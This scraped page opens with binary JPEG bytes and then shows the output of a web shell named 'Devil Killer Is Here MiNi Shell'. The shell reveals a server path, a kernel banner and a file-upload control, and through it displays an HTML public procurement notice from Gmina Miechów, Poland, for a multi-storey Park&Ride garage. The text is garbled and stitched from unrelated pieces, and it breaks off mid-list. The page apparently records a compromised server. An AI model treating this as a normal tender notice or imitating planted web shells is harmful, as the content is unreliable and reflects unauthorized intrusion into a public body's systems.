JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250703/0030798701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa wielopoziomowego parkingu Park&amp;Ride przy ul. Kolejowej w Miechowie” w ramach programu „Niskoemisyjny system transportu miejskiego wraz z rozbudową parkingu p&amp;r przy stacji kolejowej miechów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miechów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000523940</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sienkiewicza 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Miechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@miechow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.miechow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa wielopoziomowego parkingu Park&amp;Ride przy ul. Kolejowej w Miechowie” w ramach programu „Niskoemisyjny system transportu miejskiego wraz z rozbudową parkingu p&amp;r przy stacji kolejowej miechów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-647fd261-92a4-40c4-b57b-827f14a16194</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00307987</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00022379/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Rozbudowa parkingu P&amp;R przy stacji kolejowej w Miechów w ramach projektu „ Niskoemisyjny system transportu miejskiego wraz z rozbudową parkingu P&amp;R przy stacji kolejowej w Miechów”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> FEMP.03.02-IZ.00-0233/24, Program: Fundusze Europejskie dla Małopolski 2021-2027, Nr Naboru FEMP.03.02-IZ.00-034/24, Priorytet Fundusze europejskie dla transportu miejskiego, Działanie: Transport miejski, Typ projektu: A. Transport miejski, Europejski Fundusz Rozwoju Regionalnego. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/miechow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/miechow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2024 r. poz. 1513 z późn. zm.). <br/> 2. Ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie, o którym mowa w Rozdziale IX ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/> 3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/> 1) poprzez Platformę, dostępną pod adresem: www.platformazakupowa.pl/miechow <br/>postępowanie ID 1134519</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">ZGODNIE Z ROZDZ. II SWZ: <br/>1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/> 1) administratorem Pani/Pana danych osobowych jest: Gmina Miechów <br/> 2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@ugim.miechow.eu.<br/> 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego/trybie podstawowym.<br/> 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP<br/> 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> 6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/> 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/> 8) posiada Pani/Pan:<br/> a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/> b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/> c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/> d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/> 9) nie przysługuje Pani/Panu:<br/> a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/> 10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.17.25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 22628900,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest kompleksowa realizacja zadania pn: „Budowa wielopoziomowego parkingu Park&amp;Ride przy ul. Kolejowej w Miechowie” w formule zaprojektuj i wybuduj, obejmująca wykonanie dokumentacji projektowej wraz ze wszystkimi wymaganymi przepisami prawa uzgodnieniami i uzyskaniem ostatecznej decyzji pozwolenia na budowę, pełnieniem nadzoru autorskiego w trakcie realizacji robót, wykonanie na jej podstawie wszystkich robót budowlanych wraz z uzyskaniem decyzji pozwolenia na użytkowanie/dokonanie zgłoszenia zakończenia budowy (zgodnie z warunkami określonymi w decyzji pozwolenia na budowę i wymogami ustawy Prawo budowlane).<br/>2. Inwestycja realizowana będzie na działkach nr ewid. 312/20, 312/25, 312/27, 312/28 obręb Miechów, gmina Miechów w województwie małopolskim.<br/>3. Inwestycja realizowana jest w ramach projektu „Niskoemisyjny system transportu miejskiego wraz z rozbudową parkingu P&amp;R przy stacji kolejowej Miechów”. Zamawiający informuje, że jeżeli w trakcie opracowania dokumentacji projektowej dla zadania zajdzie konieczność uszczegółowienia/rozszerzenia nazwy zadania, należy w tej nazwie zawsze wprowadzać zapis „Niskoemisyjny system transportu miejskiego wraz z rozbudową parkingu P&amp;R przy stacji kolejowej Miechów”.<br/>4. Zadanie dofinansowane jest przez Województwo Małopolskie w ramach projektu: FEMP.03.02-IZ.00-0233/24, Program: Fundusze Europejskie dla Małopolski 2021-2027, Nr Naboru FEMP.03.02-IZ.00-034/24, Priorytet Fundusze europejskie dla transportu miejskiego, Działanie: Transport miejski, Typ projektu: A. Transport miejski, Europejski Fundusz Rozwoju Regionalnego.<br/>5. Inwestycja polegać będzie na zaprojektowaniu i wybudowaniu, zgodnie z założeniami określonymi w PFU, budynku wielopoziomowego (4 kondygnacje) garażu/parkingu &#34;Park&amp;Ride&#34; wraz z wewnętrznymi i zewnętrznymi instalacjami oraz zagospodarowaniem terenu o liczbie stanowisk postojowych 200 dla samochodów osobowych, w tym:<br/> • 8 miejsc dla osób niepełnosprawnych,<br/> • 14 miejsc zewnętrznych dla pojazdów elektrycznych z możliwością ładowania – 2 punkty ładowania (1 stacja ładowania x 2 punkty),<br/>Dodatkowo:<br/> • 12 miejsc dla rowerów,<br/> • 8 miejsc dla motocykli,<br/> • 4 miejsca dla autokarów.<br/>6. Budynek będzie wyposażony w instalację PV o mocy nieprzekraczającej 150 kW (ok. 330 szt. paneli fotowoltaicznych) z magazynem energii o pojemności 97 kWh i mocy 100 kW, do zasilania stacji ładowania pojazdów elektrycznych oraz obiektu.<br/>7. Budynek będzie połączony komunikacyjnie z istniejącym peronem stacji kolejowej za pomocą zadaszonej i oświetlonej kładki pieszej przylegającej do jednej z dwóch klatek schodowych.<br/>8. Budowana infrastruktura obsługi podróżnych, będzie uwzględniać potrzeby osób o ograniczonej mobilności.<br/>9. Zakres rozwiązań projektowych obejmuje m.in.:<br/> • pozyskanie niezbędnych podkładów/map geodezyjnych, wypisów, wyrysów z zasobów geodezyjnych Starostwa Powiatowego oraz PKP;<br/> • wykonanie mapy sytuacyjno-wysokościowej dla całego zakresu inwestycji;<br/> • wykonanie badań geotechnicznych w niezbędnym i wymaganym zakresie;<br/> • uzyskanie decyzji o środowiskowych uwarunkowaniach; w przypadku gdy projektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie z obowiązującymi przepisami, uzyskanie decyzji o środowiskowych uwarunkowaniach, należy dołączyć do dokumentacji opinię • organu właściwego do wydania przedmiotowej decyzji potwierdzającą brak konieczności jej uzyskania;<br/> • wykonanie operatu wodnoprawnego; w przypadku gdy projektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie z obowiązującymi przepisami, uzyskanie Pozwolenia wodnoprawnego, należy dołączyć do dokumentacji opinię organu właściwego do wydania decyzji – pozwolenie wodnoprawne, potwierdzającą brak konieczności jej uzyskania;<br/> • opracowanie inwentaryzacji zieleni i drzew oraz uzyskanie decyzji na wycinkę kolidujących drzew, w tym projekt ewentualnych nowych nasadzeń; w przypadku naliczenia opłat z tytułu wycinki, ich koszty obciążają Gminę Miechów;<br/> • zaprojektowanie i wykonanie niezbędnych sieci, przekładek istniejących kolidujących sieci/przyłączy, przyłączy, infrastruktury technicznej oraz wykonanie robót rozbiórkowych obiektów znajdujących się na terenie przeznaczonym pod inwestycję zgodnie z założeniami wariantu określonego w PFU lub/i które okażą się niezbędne w czasie wykonywania dokumentacji projektowej/realizacji robót budowlanych zgodnie z otrzymanymi warunkami od ich zarządców i założeniami PFU;<br/> • zaprojektowanie budynku wielopoziomowego garażu/parkingu Park&amp;Ride wraz z instalacjami i sieciami zgodnie z założeniami określonymi w PFU;<br/> • projekt zagospodarowania terenu zgodnie z założeniami określonymi w PFU;<br/> • zaprojektowanie instalacji fotowoltaicznej wraz z magazynem energii zgodnie z założeniami PFU;<br/> • projekt zmiany organizacji ruchu na czas wykonywania robót budowlanych wraz z uzgodnieniami;<br/> • wykonanie projektu stałej organizacji ruchu, jej uzgodnienie (oznakowanie poziome i pionowe, elementy bezpieczeństwa ruchu);<br/> • uzyskanie wszelkich niezbędnych uzgodnień dokumentacji projektowej wymaganej przepisami prawa, w tym opinie, pozwolenia, postanowienia;<br/> • uzyskanie ostatecznej decyzji pozwolenia na budowę;<br/> • pełnienie nadzoru autorskiego w czasie realizacji robót budowlanych; w przypadku konieczności uszczegółowienia/zmiany dokumentacji na etapie wykonywania robot, a zmiany te nie wynikają ze zmiany obowiązujących w trakcie realizacji dokumentacji przepisów prawa, Wykonawcy zadania nie będzie przysługiwało w tym zakresie dodatkowe wynagrodzenie;<br/> • wykonanie przedmiarów i kosztorysów inwestorskich dla poszczególnych branż w układzie technologicznym; Zamawiający określa, aby kosztorysy były wykonane wg poniższego podziału ze względu na uwarunkowania realizacji projektu:<br/> ◦ budowa wielopoziomowego parkingu Park&amp;Ride przy ul. Kolejowej w Miechowie;<br/> ◦ budowa instalacji fotowoltaicznej z magazynem energii;<br/> ◦ budowa punktu ładowania z ładowarką podwójną<br/> • wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych.<br/> • Uzyskanie decyzji wyłączenia gruntów z produkcji rolnej jeżeli będzie wymagane<br/> • Wykonawca zobowiązany jest do przedłożenia Zamawiającemu koncepcji projektowej do akceptacji oraz do przedłożenia do akceptacji wykonanej dokumentacji projektowej ( wykonanej • na podstawie zaakceptowanej koncepcji) przed złożeniem wniosku o zatwierdzenie dokumentacji projektowej i wydanie decyzji pozwolenia na budowę.<br/>10. W projekcie należy uwzględnić warunki określone w pozytywnej opinii PKP PLK S.A Zakład Linii Kolejowych w Krakowie Nr IZ06DG.2133.119.2024.AS.4 dotyczącej planowanej inwestycji.<br/>11. W zakresie wykonania robót budowlanych zakres zadania obejmuje:<br/> • zapewnienie pełnej obsługi geodezyjnej w czasie wykonywania zamówienia i wykonanie geodezyjnej inwentaryzacji powykonawczej zadania;<br/> • zapewnienia przez Wykonawcę zadania objęcia i kierowania budową przez osoby posiadające wymagane uprawnienia w poszczególnych branżach;<br/> • przekazania kompletu dokumentów ze strony Wykonawcy niezbędnych do zgłoszenia rozpoczęcia budowy w organie nadzoru budowlanego;<br/> • wykonanie całości robót budowlanych na podstawie zatwierdzonej przez Zamawiającego i właściwy organ administracji architektoniczno-budowlanej dokumentacji projektowej wraz z decyzją pozwolenia na budowę oraz wykonanie zadania zgodnie z zasadami wiedzy technicznej;<br/> • po wykonaniu robót budowlanych uzyskanie decyzji pozwolenia na użytkowanie/zgłoszenia zakończenia budowy wraz z zaświadczeniem, że organ nie wniósł sprzeciwu do dokonanego zgłoszenia;<br/> • przekazanie Zamawiającemu przedmiotu umowy na zasadach określonych w umowie;<br/> • sprawowanie nadzoru autorskiego przez cały okres realizacji zamówienia;<br/> • opracowanie, skompletowanie i przekazanie Zamawiającemu dokumentacji powykonawczej w formie operatu;<br/> • w trakcie realizacji robót wykonanie wszelkich niezbędnych prób, sprawdzeń, uzyskanie wszelkich niezbędnych protokołów, decyzji niezbędnych do dokonania odbioru obiektu oraz dokonanie przeszkolenia personelu Zamawiającego w zakresie obsługi budynku.<br/>12. Zakres prac oraz odpowiedzialność Wykonawcy w ramach zamówienia i oferowanej ceny obejmują również:<br/> • organizację i zagospodarowanie zaplecza i placu budowy, w tym ogrodzenia, bariery itp.;<br/> • poniesienie ewentualnych kosztów wyłączeń i włączeń energii elektrycznej, koszty zużycia wody i energii w okresie realizacji robót, opłat za zajęcie pasa drogowego;<br/> • w przypadku zniszczenia lub uszkodzenia robót, ich części bądź urządzeń w toku realizacji –naprawienie ich i doprowadzenie do stanu pierwotnego;<br/> • wykonanie badań, prób i rozruchu, jak również dokonanie odkrywek w przypadku niezgłoszenia do odbioru robót ulegających zakryciu lub zanikających;<br/> • zapewnienie dozoru, a także właściwych warunków bezpieczeństwa i higieny pracy;<br/> • utrzymanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwanie na bieżąco zbędnych materiałów, odpadów i śmieci;<br/> • oznakowanie, zabezpieczenie i oświetlenie miejsc kolizyjnych; • po zakończeniu robót doprowadzenie placu budowy do stanu pierwotnego, demontaż obiektów tymczasowych oraz uporządkowanie terenu;<br/> • powiadamianie właściwych organów/instytucji/urzędów o prowadzonych robotach w związku z otrzymanymi warunkami/uzgodnieniami dokumentacji projektowej.<br/>13. Szczegółowy zakres zadania, w tym dokumentacji projektowej, wykonania na jej podstawie robót budowlanych, ogólne właściwości funkcjonalno-użytkowe opisuje niniejsza SWZ, załącznik nr 7do SWZ – Program Funkcjonalno-Użytkowy oraz załącznik nr 6 do SWZ – wzór umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">79930000-2 - Specjalne usługi projektowe</p> <p class="mb-0">79932000-6 - Usługi projektowania wnętrz</p> <p class="mb-0">79933000-3 - Usługi towarzyszące usługom projektowym</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45112500-0 - Usuwanie gleby</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45120000-4 - Próbne wiercenia i wykopy</p> <p class="mb-0">45122000-8 - Próbne wykopy</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45236000-0 - Wyrównywanie terenu</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45312000-7 - Instalowanie systemów alarmowych i anten</p> <p class="mb-0">45313000-4 - Instalowanie wind i ruchomych schodów</p> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń 